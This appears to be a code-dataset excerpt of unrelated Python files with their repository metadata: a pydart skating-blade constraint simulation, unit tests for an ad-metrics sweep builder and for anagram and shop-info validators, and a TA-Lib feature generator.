self.nh0.set_joint_pos(np.dot(R, right_blade_front_point - body_pos) + body_pos)
self.nh1.set_joint_pos(np.dot(R, right_blade_rear_point - body_pos) + body_pos)
self.nh0.set_projected_vector(np.dot(R, right_blade_front_point - right_blade_rear_point))
self.nh1.set_projected_vector(np.dot(R, right_blade_front_point - right_blade_rear_point))
else:
self.nh0.activate(False)
self.nh1.activate(False)
left_blade_front_point = self.skeletons[1].body("h_blade_left").to_world((0.0216+0.104, -0.0216-0.027, 0.))
left_blade_rear_point = self.skeletons[1].body("h_blade_left").to_world((0.0216-0.104, -0.0216-0.027, 0.))
if left_blade_front_point[1] < 0.005 +self.ground_height and left_blade_rear_point[1] < 0.005+self.ground_height:
self.nh2.activate(True)
self.nh3.activate(True)
body_pos = self.skeletons[1].body('h_blade_left').to_world((0., -0.0216-0.027, 0.))
body_vec = self.skeletons[1].body('h_blade_left').to_world() - body_pos # type: np.ndarray
projected_body_vec = body_vec.copy()
projected_body_vec[1] = 0.
projected_body_vel = self.skeletons[1].body('h_blade_left').world_linear_velocity()
projected_body_vel[1] = 0.
inclined_angle = math.pi/2. - math.acos(np.dot(mm.normalize(body_vec), mm.normalize(projected_body_vec)))
# calculate inclined angle theta
# if 9.0 < self.time() and self.time() < 9.5:
# if 8. < self.time() and self.time() < 8.5:
# radi = 1.
# g = 9.8
# inclined_angle = math.atan(
# self.skeletons[1].body('h_pelvis').com_linear_velocity()[0] ** 2 / (radi * g))
# print("left_angle: ", inclined_angle)
# q_temp = self.skeletons[1].q
# q_temp[self.skeletons[1].dof_indices(["j_heel_left_x"])] = inclined_angle
# self.skeletons[1].set_positions(q_temp)
#
# turning_angle = np.copysign(inclined_angle / 4. , np.dot(projected_body_vel, mm.cross(projected_body_vec, mm.unitY())))
turning_angle = np.copysign(max(inclined_angle-15./180.*math.pi, 0.)/4., np.dot(projected_body_vel, mm.cross(projected_body_vec, mm.unitY())))
R = mm.exp(mm.unitY(), turning_angle)
self.nh2.set_joint_pos(np.dot(R, left_blade_front_point - body_pos) + body_pos)
self.nh3.set_joint_pos(np.dot(R, left_blade_rear_point - body_pos) + body_pos)
self.nh2.set_projected_vector(np.dot(R, left_blade_front_point - left_blade_rear_point))
self.nh3.set_projected_vector(np.dot(R, left_blade_front_point - left_blade_rear_point))
else:
self.nh2.activate(False)
self.nh3.activate(False)
super(NHWorldV2, self).step()
class NHWorldV3(pydart.World):
def __init__(self, step, skel_path=None, xmlstr=False):
self.has_nh = False
super(NHWorldV3, self).__init__(step, skel_path, xmlstr)
# nonholonomic constraint initial setting
skel = self.skeletons[1]
self.skeletons[0].body(0).set_friction_coeff(0.02)
# self.skeletons[0].body(0).set_friction_coeff(0.32)
self.nh0 = pydart.constraints.NonHolonomicContactConstraint(skel.body('h_blade_right'), np.array((0.0216+0.104, -0.0216-0.027, 0.)))
self.nh1 = pydart.constraints.NonHolonomicContactConstraint(skel.body('h_blade_right'), np.array((0.0216-0.104, -0.0216-0.027, 0.)))
self.nh2 = pydart.constraints.NonHolonomicContactConstraint(skel.body('h_blade_left'), np.array((0.0216+0.104, -0.0216-0.027, 0.)))
self.nh3 = pydart.constraints.NonHolonomicContactConstraint(skel.body('h_blade_left'), np.array((0.0216-0.104, -0.0216-0.027, 0.)))
self.nh0.add_to_world()
self.nh1.add_to_world()
self.nh2.add_to_world()
self.nh3.add_to_world()
self.has_nh = True
self.ground_height = 0.
def reset(self):
super(NHWorldV3, self).reset()
self.skeletons[0].body(0).set_friction_coeff(0.02)
# self.skeletons[0].body(0).set_friction_coeff(0.32)
if self.has_nh:
self.nh0.add_to_world()
self.nh1.add_to_world()
self.nh2.add_to_world()
self.nh3.add_to_world()
def step(self):
# nonholonomic constraint
right_blade_front_point = self.skeletons[1].body("h_blade_right").to_world((0.0216+0.104, -0.0216-0.027, 0.))
right_blade_rear_point = self.skeletons[1].body("h_blade_right").to_world((0.0216-0.104, -0.0216-0.027, 0.))
if right_blade_front_point[1] < 0.005 + self.ground_height and right_blade_rear_point[1] > 0.05 + self.ground_height:
self.skeletons[0].body(0).set_friction_coeff(1.0)
# print("TOE PICK CONTACT!!! RIGHT")
else:
self.skeletons[0].body(0).set_friction_coeff(0.02)
if right_blade_front_point[1] < 0.005+self.ground_height and right_blade_rear_point[1] < 0.005+self.ground_height:
self.nh0.activate(True)
self.nh1.activate(True)
body_pos = self.skeletons[1].body('h_blade_right').to_world((0., -0.0216-0.027, 0.))
body_vec = self.skeletons[1].body('h_blade_right').to_world() - body_pos # type: np.ndarray
projected_body_vec = body_vec.copy()
projected_body_vec[1] = 0.
projected_body_vel = self.skeletons[1].body('h_blade_right').world_linear_velocity()
projected_body_vel[1] = 0.
inclined_angle = math.pi/2. - math.acos(np.dot(mm.normalize(body_vec), mm.normalize(projected_body_vec)))
#calculate inclined angle theta
# print("vel: ", self.skeletons[1].body('h_blade_right').com_linear_velocity()[1])
# print(self.time())
# if 9. < self.time() and self.time() < 9.5:
# if 8. < self.time() and self.time() < 8.5:
# radi = 1.0
# g = 9.8
# inclined_angle = math.atan(self.skeletons[1].body('h_pelvis').com_linear_velocity()[0]**2 / (radi * g) )
# print("right_angle: ", inclined_angle)
# q_temp = self.skeletons[1].q
# q_temp[self.skeletons[1].dof_indices(["j_heel_right_x"])] = inclined_angle
# self.skeletons[1].set_positions(q_temp)
# turning_angle = np.copysign(inclined_angle / 4. ,
# np.dot(projected_body_vel, mm.cross(projected_body_vec, mm.unitY())))
turning_angle = np.copysign(max(inclined_angle-15./180.*math.pi, 0.)/4., np.dot(projected_body_vel, mm.cross(projected_body_vec, mm.unitY())))
# turning_angle = np.copysign(max(inclined_angle-5./180.*math.pi, 0.) / 4.,
# np.dot(projected_body_vel, mm.cross(projected_body_vec, mm.unitY())))
R = mm.exp(mm.unitY(), turning_angle)
self.nh0.set_joint_pos(np.dot(R, right_blade_front_point - body_pos) + body_pos)
self.nh1.set_joint_pos(np.dot(R, right_blade_rear_point - body_pos) + body_pos)
self.nh0.set_projected_vector(np.dot(R, right_blade_front_point - right_blade_rear_point))
self.nh1.set_projected_vector(np.dot(R, right_blade_front_point - right_blade_rear_point))
else:
self.nh0.activate(False)
self.nh1.activate(False)
left_blade_front_point = self.skeletons[1].body("h_blade_left").to_world((0.0216+0.104, -0.0216-0.027, 0.))
left_blade_rear_point = self.skeletons[1].body("h_blade_left").to_world((0.0216-0.104, -0.0216-0.027, 0.))
# if left_blade_front_point[1] < 0.005 + self.ground_height and left_blade_rear_point[1] > 0.1 + self.ground_height:
# self.skeletons[0].body(0).set_friction_coeff(1.0)
# print("TOE PICK CONTACT!!! LEFT")
# else:
# self.skeletons[0].body(0).set_friction_coeff(0.02)
if left_blade_front_point[1] < 0.005 +self.ground_height and left_blade_rear_point[1] < 0.005+self.ground_height:
self.nh2.activate(True)
self.nh3.activate(True)
body_pos = self.skeletons[1].body('h_blade_left').to_world((0., -0.0216-0.027, 0.))
body_vec = self.skeletons[1].body('h_blade_left').to_world() - body_pos # type: np.ndarray
projected_body_vec = body_vec.copy()
projected_body_vec[1] = 0.
projected_body_vel = self.skeletons[1].body('h_blade_left').world_linear_velocity()
projected_body_vel[1] = 0.
inclined_angle = math.pi/2. - math.acos(np.dot(mm.normalize(body_vec), mm.normalize(projected_body_vec)))
# calculate inclined angle theta
# if 9.0 < self.time() and self.time() < 9.5:
# if 8. < self.time() and self.time() < 8.5:
# radi = 1.
# g = 9.8
# inclined_angle = math.atan(
# self.skeletons[1].body('h_pelvis').com_linear_velocity()[0] ** 2 / (radi * g))
# print("left_angle: ", inclined_angle)
# q_temp = self.skeletons[1].q
# q_temp[self.skeletons[1].dof_indices(["j_heel_left_x"])] = inclined_angle
# self.skeletons[1].set_positions(q_temp)
#
# turning_angle = np.copysign(inclined_angle / 4. , np.dot(projected_body_vel, mm.cross(projected_body_vec, mm.unitY())))
turning_angle = np.copysign(max(inclined_angle-15./180.*math.pi, 0.)/4., np.dot(projected_body_vel, mm.cross(projected_body_vec, mm.unitY())))
# turning_angle = np.copysign(max(inclined_angle-5./180.*math.pi, 0.) / 4.,
# np.dot(projected_body_vel, mm.cross(projected_body_vec, mm.unitY())))
R = mm.exp(mm.unitY(), turning_angle)
self.nh2.set_joint_pos(np.dot(R, left_blade_front_point - body_pos) + body_pos)
self.nh3.set_joint_pos(np.dot(R, left_blade_rear_point - body_pos) + body_pos)
self.nh2.set_projected_vector(np.dot(R, left_blade_front_point - left_blade_rear_point))
self.nh3.set_projected_vector(np.dot(R, left_blade_front_point - left_blade_rear_point))
else:
self.nh2.activate(False)
self.nh3.activate(False)
super(NHWorldV3, self).step()
| 52.20597
| 154
| 0.629882
| 2,540
| 17,489
| 4.061024
| 0.050787
| 0.071837
| 0.030247
| 0.052351
| 0.975085
| 0.964905
| 0.964905
| 0.957538
| 0.951139
| 0.946195
| 0
| 0.067306
| 0.230316
| 17,489
| 334
| 155
| 52.362275
| 0.698982
| 0.2039
| 0
| 0.844221
| 0
| 0
| 0.0325
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.045226
| false
| 0
| 0.020101
| 0
| 0.080402
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e5b157c8d462330b646be148fe7ff940241a84cd
| 4,001
|
py
|
Python
|
tests/sweep_builder/expectation_builder/expectations_inventory/metrics/test_breakdowns.py
|
panoramichq/data-collection-fb
|
550b90a303c880ae8c3dfd2801dc4f991a969f89
|
[
"MIT"
] | null | null | null |
tests/sweep_builder/expectation_builder/expectations_inventory/metrics/test_breakdowns.py
|
panoramichq/data-collection-fb
|
550b90a303c880ae8c3dfd2801dc4f991a969f89
|
[
"MIT"
] | null | null | null |
tests/sweep_builder/expectation_builder/expectations_inventory/metrics/test_breakdowns.py
|
panoramichq/data-collection-fb
|
550b90a303c880ae8c3dfd2801dc4f991a969f89
|
[
"MIT"
] | null | null | null |
from datetime import datetime, date
from unittest.mock import patch
from common.enums.entity import Entity
from common.enums.reporttype import ReportType
from common.job_signature import JobSignature
from sweep_builder.data_containers.entity_node import EntityNode
from sweep_builder.data_containers.expectation_claim import ExpectationClaim
from sweep_builder.data_containers.reality_claim import RealityClaim
from sweep_builder.expectation_builder.expectations_inventory.metrics.breakdowns import (
day_metrics_per_ads_under_ad_account,
)
@patch('sweep_builder.expectation_builder.expectations_inventory.metrics.breakdowns.iter_reality_per_ad_account_claim')
def test_day_metrics_per_entity_under_ad_account_not_divisible(mock_iter_reality_per_ad_account):
reality_claim = RealityClaim(
ad_account_id='ad-account-id',
entity_id='ad-account-id',
entity_type=Entity.AdAccount,
timezone='America/Los_Angeles',
)
mock_iter_reality_per_ad_account.return_value = [
RealityClaim(
entity_type=Entity.Ad,
campaign_id='campaign-1',
adset_id='adset-1',
entity_id='ad-1',
bol=datetime(2019, 1, 1, 12, 0),
eol=datetime(2019, 1, 2, 12, 0),
),
RealityClaim(
entity_type=Entity.Ad, entity_id='ad-2', bol=datetime(2019, 1, 3, 12, 0), eol=datetime(2019, 1, 3, 12, 0)
),
]
result = list(day_metrics_per_ads_under_ad_account([ReportType.day], reality_claim))
assert result == [
ExpectationClaim(
'ad-account-id',
Entity.AdAccount,
ReportType.day,
Entity.Ad,
JobSignature('fb|ad-account-id|||day|A|2019-01-01'),
ad_account_id='ad-account-id',
timezone='America/Los_Angeles',
range_start=date(2019, 1, 1),
),
ExpectationClaim(
'ad-account-id',
Entity.AdAccount,
ReportType.day,
Entity.Ad,
JobSignature('fb|ad-account-id|||day|A|2019-01-02'),
ad_account_id='ad-account-id',
timezone='America/Los_Angeles',
range_start=date(2019, 1, 2),
),
ExpectationClaim(
'ad-account-id',
Entity.AdAccount,
ReportType.day,
Entity.Ad,
JobSignature('fb|ad-account-id|||day|A|2019-01-03'),
ad_account_id='ad-account-id',
timezone='America/Los_Angeles',
range_start=date(2019, 1, 3),
),
]
@patch('sweep_builder.expectation_builder.expectations_inventory.metrics.breakdowns.iter_reality_per_ad_account_claim')
def test_day_metrics_per_entity_under_ad_account_is_divisible(mock_iter_reality_per_ad_account):
reality_claim = RealityClaim(
ad_account_id='ad-account-id',
entity_id='ad-account-id',
entity_type=Entity.AdAccount,
timezone='America/Los_Angeles',
)
mock_iter_reality_per_ad_account.return_value = [
RealityClaim(
entity_type=Entity.Ad,
campaign_id='campaign-1',
adset_id='adset-1',
entity_id='ad-1',
bol=datetime(2019, 1, 1, 12, 0),
eol=datetime(2019, 1, 1, 12, 0),
)
]
result = list(day_metrics_per_ads_under_ad_account([ReportType.day], reality_claim))
assert result == [
ExpectationClaim(
'ad-account-id',
Entity.AdAccount,
ReportType.day,
Entity.Ad,
JobSignature('fb|ad-account-id|||day|A|2019-01-01'),
ad_account_id='ad-account-id',
timezone='America/Los_Angeles',
range_start=date(2019, 1, 1),
entity_hierarchy=EntityNode(
'ad-account-id',
Entity.AdAccount,
children=[EntityNode('campaign-1', Entity.Campaign, children=[EntityNode('adset-1', Entity.AdSet)])],
),
)
]
| 35.40708
| 119
| 0.627843
| 475
| 4,001
| 5.018947
| 0.151579
| 0.128356
| 0.106124
| 0.064178
| 0.830117
| 0.768876
| 0.754195
| 0.741611
| 0.713087
| 0.713087
| 0
| 0.040298
| 0.261935
| 4,001
| 112
| 120
| 35.723214
| 0.767017
| 0
| 0
| 0.70297
| 0
| 0
| 0.175956
| 0.089478
| 0
| 0
| 0
| 0
| 0.019802
| 1
| 0.019802
| false
| 0
| 0.089109
| 0
| 0.108911
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e5b1895f6975d1d01b286298676175c4eb266b92
| 11,708
|
py
|
Python
|
homework/Write Few Python Programs/test_impl_with_nose.py
|
rvprasad/software-testing-course
|
3803851dcf9f7bbd0f0b89fca6c9c5e3a48f22e0
|
[
"CC-BY-4.0"
] | 11
|
2018-02-08T05:23:28.000Z
|
2021-05-24T13:23:56.000Z
|
homework/Write Few Python Programs/test_impl_with_nose.py
|
rvprasad/software-testing-course
|
3803851dcf9f7bbd0f0b89fca6c9c5e3a48f22e0
|
[
"CC-BY-4.0"
] | null | null | null |
homework/Write Few Python Programs/test_impl_with_nose.py
|
rvprasad/software-testing-course
|
3803851dcf9f7bbd0f0b89fca6c9c5e3a48f22e0
|
[
"CC-BY-4.0"
] | 2
|
2020-09-15T08:51:22.000Z
|
2021-01-26T12:07:18.000Z
|
import impl
import nose
def test_anagram_check_success():
nose.tools.assert_true(impl.anagram_check('Madam Curie', 'Radium came'))
nose.tools.assert_true(impl.anagram_check('Who came', 'How mace'))
nose.tools.assert_true(impl.anagram_check('his malt', 'salt him'))
nose.tools.assert_true(impl.anagram_check('god', 'dog'))
nose.tools.assert_true(impl.anagram_check('evil', 'live'))
nose.tools.assert_true(impl.anagram_check('mace', 'came'))
nose.tools.assert_true(impl.anagram_check('who ever', 'however'))
def test_anagram_check_for_invalid_words():
nose.tools.assert_false(impl.anagram_check('collapse', 'lapsecol'))
nose.tools.assert_false(impl.anagram_check('collapse', 'laps cole'))
nose.tools.assert_false(impl.anagram_check('karaoke singing', 'ring soaking kae'))
nose.tools.assert_false(impl.anagram_check('life time', 'meet fili'))
nose.tools.assert_false(impl.anagram_check("fall", "llaf")) # ??
def test_anagram_check_not_permutation():
nose.tools.assert_false(impl.anagram_check('really', 'leary'))
nose.tools.assert_false(impl.anagram_check('collapse', 'elapsed'))
nose.tools.assert_false(impl.anagram_check('life time', 'meet file'))
def test_anagram_for_None1():
flag1 = False
flag2 = False
try:
flag2 = not impl.anagram_check(None, '')
except ValueError: # What can go wrong without specific exception type?
flag1 = True
assert flag1 or flag2 # Using assert
def test_anagram_for_None2():
flag1 = False
flag2 = False
try:
flag2 = not impl.anagram_check('', None)
except ValueError:
flag1 = True
nose.tools.assert_true(flag1 or flag2)
def test_anagram_for_None3():
flag1 = False
flag2 = False
try:
flag2 = not impl.anagram_check(None, None)
except ValueError:
flag1 = True
nose.tools.assert_true(flag1 or flag2)
def test_anagram_for_invalid_type1():
flag1 = False
flag2 = False
try:
flag2 = not impl.anagram_check(1234, '')
except ValueError:
flag1 = True
nose.tools.assert_true(flag1 or flag2)
def test_anagram_for_invalid_type2():
flag1 = False
flag2 = False
try:
flag2 = not impl.anagram_check('', 1234)
except ValueError:
flag1 = True
nose.tools.assert_true(flag1 or flag2)
def test_anagram_for_invalid_type3():
flag1 = False
flag2 = False
try:
flag2 = not impl.anagram_check(1234, 1234)
except ValueError:
flag1 = True
nose.tools.assert_true(flag1 or flag2)
NAME = "Harry"
PHONE = 7855326350
EMAIL = "harry@ksu.edu"
URL = "http://ksu.edu/~harry"
URL = "http://www.microsoft.com/~harry"
URL = "http://127.1.1.0"
def test_shopinfo_for_all_valid1():
tmp1 = impl.ShopInfo(NAME, PHONE, EMAIL, URL)
nose.tools.assert_equal(tmp1.get_name(), NAME)
nose.tools.assert_equal(tmp1.get_phone(), PHONE)
nose.tools.assert_equal(tmp1.get_email(), EMAIL)
assert tmp1.get_website() == URL # Using assert
def test_shopinfo_for_all_valid2():
email = "john.doe@example.com"
tmp1 = impl.ShopInfo(NAME, PHONE, email, URL)
nose.tools.assert_equal(tmp1.get_name(), NAME)
nose.tools.assert_equal(tmp1.get_phone(), PHONE)
nose.tools.assert_equal(tmp1.get_email(), email)
nose.tools.assert_equal(tmp1.get_website(), URL)
def test_shopinfo_for_all_valid3():
url = "http://1.2.3.4/what/"
tmp1 = impl.ShopInfo(NAME, PHONE, EMAIL, url)
nose.tools.assert_equal(tmp1.get_name(), NAME)
nose.tools.assert_equal(tmp1.get_phone(), PHONE)
nose.tools.assert_equal(tmp1.get_email(), EMAIL)
nose.tools.assert_equal(tmp1.get_website(), url)
def test_shopinfo_name_for_invalid_value1():
tmp1 = impl.ShopInfo("1234", PHONE, EMAIL, URL)
nose.tools.assert_raises(ValueError, tmp1.get_name)
nose.tools.assert_equal(tmp1.get_phone(), PHONE)
nose.tools.assert_equal(tmp1.get_email(), EMAIL)
nose.tools.assert_equal(tmp1.get_website(), URL)
def test_shopinfo_name_for_invalid_value2():
tmp1 = impl.ShopInfo("", PHONE, EMAIL, URL)
nose.tools.assert_raises(ValueError, tmp1.get_name)
nose.tools.assert_equal(tmp1.get_phone(), PHONE)
nose.tools.assert_equal(tmp1.get_email(), EMAIL)
nose.tools.assert_equal(tmp1.get_website(), URL)
def test_shopinfo_name_for_invalid_value3():
tmp1 = impl.ShopInfo(None, PHONE, EMAIL, URL)
nose.tools.assert_raises(ValueError, tmp1.get_name)
nose.tools.assert_equal(tmp1.get_phone(), PHONE)
nose.tools.assert_equal(tmp1.get_email(), EMAIL)
nose.tools.assert_equal(tmp1.get_website(), URL)
def test_shopinfo_name_for_invalid_value4():
name = "Seven-11"
tmp1 = impl.ShopInfo(name, PHONE, EMAIL, URL)
nose.tools.assert_raises(ValueError, tmp1.get_name)
nose.tools.assert_equal(tmp1.get_phone(), PHONE)
nose.tools.assert_equal(tmp1.get_email(), EMAIL)
nose.tools.assert_equal(tmp1.get_website(), URL)
def test_shopinfo_name_for_invalid_type():
tmp1 = impl.ShopInfo(1234, PHONE, EMAIL, URL)
nose.tools.assert_raises(ValueError, tmp1.get_name)
nose.tools.assert_equal(tmp1.get_phone(), PHONE)
nose.tools.assert_equal(tmp1.get_email(), EMAIL)
nose.tools.assert_equal(tmp1.get_website(), URL)
def test_shoipinfo_phone_for_invalid_value1():
tmp1 = impl.ShopInfo(NAME, -7855326350, EMAIL, URL)
nose.tools.assert_equal(tmp1.get_name(), NAME)
nose.tools.assert_raises(ValueError, tmp1.get_phone)
nose.tools.assert_equal(tmp1.get_email(), EMAIL)
nose.tools.assert_equal(tmp1.get_website(), URL)
def test_shoipinfo_phone_for_invalid_value2():
tmp1 = impl.ShopInfo(NAME, 0, EMAIL, URL)
nose.tools.assert_equal(tmp1.get_name(), NAME)
nose.tools.assert_raises(ValueError, tmp1.get_phone)
nose.tools.assert_equal(tmp1.get_email(), EMAIL)
nose.tools.assert_equal(tmp1.get_website(), URL)
def test_shoipinfo_phone_for_invalid_value3():
tmp1 = impl.ShopInfo(NAME, 123412341234, EMAIL, URL)
nose.tools.assert_equal(tmp1.get_name(), NAME)
nose.tools.assert_raises(ValueError, tmp1.get_phone)
nose.tools.assert_equal(tmp1.get_email(), EMAIL)
nose.tools.assert_equal(tmp1.get_website(), URL)
def test_shoipinfo_phone_for_invalid_value4():
tmp1 = impl.ShopInfo(NAME, -412341234, EMAIL, URL)
nose.tools.assert_equal(tmp1.get_name(), NAME)
nose.tools.assert_raises(ValueError, tmp1.get_phone)
nose.tools.assert_equal(tmp1.get_email(), EMAIL)
nose.tools.assert_equal(tmp1.get_website(), URL)
def test_shopinfo_phone_for_invalid_value5():
tmp1 = impl.ShopInfo(NAME, None, EMAIL, URL)
nose.tools.assert_equal(tmp1.get_name(), NAME)
nose.tools.assert_raises(ValueError, tmp1.get_phone)
nose.tools.assert_equal(tmp1.get_email(), EMAIL)
nose.tools.assert_equal(tmp1.get_website(), URL)
def test_shopinfo_phone_for_invalid_type():
tmp1 = impl.ShopInfo(NAME, str(PHONE), EMAIL, URL)
nose.tools.assert_equal(tmp1.get_name(), NAME)
nose.tools.assert_raises(ValueError, tmp1.get_phone)
nose.tools.assert_equal(tmp1.get_email(), EMAIL)
nose.tools.assert_equal(tmp1.get_website(), URL)
def test_shopinfo_email_for_invalid_value1():
tmp1 = impl.ShopInfo(NAME, PHONE, "harry", URL)
nose.tools.assert_equal(tmp1.get_name(), NAME)
nose.tools.assert_equal(tmp1.get_phone(), PHONE)
nose.tools.assert_raises(ValueError, tmp1.get_email)
nose.tools.assert_equal(tmp1.get_website(), URL)
def test_shopinfo_email_for_invalid_value2():
tmp1 = impl.ShopInfo(NAME, PHONE, "a@b@c", URL)
nose.tools.assert_equal(tmp1.get_name(), NAME)
nose.tools.assert_equal(tmp1.get_phone(), PHONE)
nose.tools.assert_raises(ValueError, tmp1.get_email)
nose.tools.assert_equal(tmp1.get_website(), URL)
def test_shopinfo_email_for_invalid_value3():
tmp1 = impl.ShopInfo(NAME, PHONE, "john..doe@example.com", URL)
nose.tools.assert_equal(tmp1.get_name(), NAME)
nose.tools.assert_equal(tmp1.get_phone(), PHONE)
nose.tools.assert_raises(ValueError, tmp1.get_email)
nose.tools.assert_equal(tmp1.get_website(), URL)
def test_shopinfo_email_for_invalid_value4():
tmp1 = impl.ShopInfo(NAME, PHONE, "john.doe@example..com", URL)
nose.tools.assert_equal(tmp1.get_name(), NAME)
nose.tools.assert_equal(tmp1.get_phone(), PHONE)
nose.tools.assert_raises(ValueError, tmp1.get_email)
nose.tools.assert_equal(tmp1.get_website(), URL)
def test_shopinfo_email_for_invalid_value5():
tmp1 = impl.ShopInfo(NAME, PHONE, "john/doe@example..com", URL)
nose.tools.assert_equal(tmp1.get_name(), NAME)
nose.tools.assert_equal(tmp1.get_phone(), PHONE)
nose.tools.assert_raises(ValueError, tmp1.get_email)
nose.tools.assert_equal(tmp1.get_website(), URL)
def test_shopinfo_email_for_invalid_value6():
tmp1 = impl.ShopInfo(NAME, PHONE, None, URL)
assert tmp1.get_name() == NAME
nose.tools.assert_equal(tmp1.get_name(), NAME)
nose.tools.assert_equal(tmp1.get_phone(), PHONE)
nose.tools.assert_raises(ValueError, tmp1.get_email)
nose.tools.assert_equal(tmp1.get_website(), URL)
def test_shopinfo_email_for_invalid_value7():
tmp1 = impl.ShopInfo(NAME, PHONE, "b", URL)
nose.tools.assert_equal(tmp1.get_name(), NAME)
nose.tools.assert_equal(tmp1.get_phone(), PHONE)
nose.tools.assert_raises(ValueError, tmp1.get_email)
nose.tools.assert_equal(tmp1.get_website(), URL)
def test_shopinfo_email_for_invalid_value8():
tmp1 = impl.ShopInfo(NAME, PHONE, "b@", URL)
nose.tools.assert_equal(tmp1.get_name(), NAME)
nose.tools.assert_equal(tmp1.get_phone(), PHONE)
nose.tools.assert_raises(ValueError, tmp1.get_email)
nose.tools.assert_equal(tmp1.get_website(), URL)
def test_shopinfo_email_for_invalid_value9():
tmp1 = impl.ShopInfo(NAME, PHONE, "@a", URL)
nose.tools.assert_equal(tmp1.get_name(), NAME)
nose.tools.assert_equal(tmp1.get_phone(), PHONE)
nose.tools.assert_raises(ValueError, tmp1.get_email)
nose.tools.assert_equal(tmp1.get_website(), URL)
def test_shopinfo_email_for_invalid_type():
tmp1 = impl.ShopInfo(NAME, PHONE, 1234, URL)
nose.tools.assert_equal(tmp1.get_name(), NAME)
nose.tools.assert_equal(tmp1.get_phone(), PHONE)
nose.tools.assert_raises(ValueError, tmp1.get_email)
nose.tools.assert_equal(tmp1.get_website(), URL)
def test_shopinfo_website_for_invalid_value1():
tmp1 = impl.ShopInfo(NAME, PHONE, EMAIL, "ksu")
nose.tools.assert_equal(tmp1.get_name(), NAME)
nose.tools.assert_equal(tmp1.get_phone(), PHONE)
nose.tools.assert_equal(tmp1.get_email(), EMAIL)
nose.tools.assert_raises(ValueError, tmp1.get_website)
def test_shopinfo_website_for_invalid_value2():
tmp1 = impl.ShopInfo(NAME, PHONE, EMAIL, "http://ksu%$^")
nose.tools.assert_equal(tmp1.get_name(), NAME)
nose.tools.assert_equal(tmp1.get_phone(), PHONE)
nose.tools.assert_equal(tmp1.get_email(), EMAIL)
nose.tools.assert_raises(ValueError, tmp1.get_website)
def test_shopinfo_website_for_invalid_value3():
tmp1 = impl.ShopInfo(NAME, PHONE, EMAIL, None)
nose.tools.assert_equal(tmp1.get_name(), NAME)
nose.tools.assert_equal(tmp1.get_phone(), PHONE)
nose.tools.assert_equal(tmp1.get_email(), EMAIL)
nose.tools.assert_raises(ValueError, tmp1.get_website)
def test_shopinfo_website_for_invalid_type():
tmp1 = impl.ShopInfo(NAME, PHONE, EMAIL, 1234)
nose.tools.assert_equal(tmp1.get_name(), NAME)
nose.tools.assert_equal(tmp1.get_phone(), PHONE)
nose.tools.assert_equal(tmp1.get_email(), EMAIL)
nose.tools.assert_raises(ValueError, tmp1.get_website)
| 35.26506
| 86
| 0.72506
| 1,687
| 11,708
| 4.774155
| 0.074096
| 0.146387
| 0.243978
| 0.213558
| 0.911597
| 0.902533
| 0.889123
| 0.833375
| 0.788552
| 0.778123
| 0
| 0.029221
| 0.143577
| 11,708
| 331
| 87
| 35.371601
| 0.77401
| 0.006833
| 0
| 0.585366
| 0
| 0
| 0.039322
| 0.005421
| 0
| 0
| 0
| 0
| 0.544715
| 1
| 0.150407
| false
| 0
| 0.00813
| 0
| 0.158537
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
006c8ad5b7c9fb5d8b98c582b2a3b6aa7909e52f
| 4,412
|
py
|
Python
|
umigame/nlp/deprecate.py
|
penguinwang96825/Umigame
|
98d647ab6f40df08fe31d6b3bc444afe229a914e
|
[
"Apache-2.0"
] | null | null | null |
umigame/nlp/deprecate.py
|
penguinwang96825/Umigame
|
98d647ab6f40df08fe31d6b3bc444afe229a914e
|
[
"Apache-2.0"
] | null | null | null |
umigame/nlp/deprecate.py
|
penguinwang96825/Umigame
|
98d647ab6f40df08fe31d6b3bc444afe229a914e
|
[
"Apache-2.0"
] | 1
|
2021-11-01T14:35:32.000Z
|
2021-11-01T14:35:32.000Z
|
import talib
import itertools
import pandas as pd
def generate_feature(price_df):
high = price_df["high"].values
low = price_df["low"].values
close = price_df["close"].values
original_columns = price_df.columns
feature_df = price_df.copy()
for t in range(7, 22):
series = pd.Series(talib.ADX(high, low, close, timeperiod=t), name=f"ADX_{t}", index=feature_df.index)
feature_df = pd.concat((feature_df, series), axis=1)
for t in range(7, 22):
series = pd.Series(talib.ADXR(high, low, close, timeperiod=t), name=f"ADXR_{t}", index=feature_df.index)
feature_df = pd.concat((feature_df, series), axis=1)
for f, s in itertools.product(range(10, 15), range(25, 30)):
series = pd.Series(talib.APO(close, fastperiod=f, slowperiod=s, matype=0), name=f"APO_{f}_{s}", index=feature_df.index)
feature_df = pd.concat((feature_df, series), axis=1)
for t in range(7, 22):
series = pd.Series(talib.AROONOSC(high, low, timeperiod=t), name=f"AROONOSC_{t}", index=feature_df.index)
feature_df = pd.concat((feature_df, series), axis=1)
for t in range(7, 22):
series = pd.Series(talib.CCI(high, low, close, timeperiod=t), name=f"CCI_{t}", index=feature_df.index)
feature_df = pd.concat((feature_df, series), axis=1)
for t in range(7, 22):
series = pd.Series(talib.CMO(close, timeperiod=t), name=f"CMO_{t}", index=feature_df.index)
feature_df = pd.concat((feature_df, series), axis=1)
for t in range(7, 22):
series = pd.Series(talib.DX(high, low, close, timeperiod=t), name=f"DX_{t}", index=feature_df.index)
feature_df = pd.concat((feature_df, series), axis=1)
for t in range(7, 22):
series = pd.Series(talib.MINUS_DI(high, low, close, timeperiod=t), name=f"MINUS_DI_{t}", index=feature_df.index)
feature_df = pd.concat((feature_df, series), axis=1)
for t in range(7, 22):
series = pd.Series(talib.MINUS_DM(high, low, timeperiod=t), name=f"MINUS_DM_{t}", index=feature_df.index)
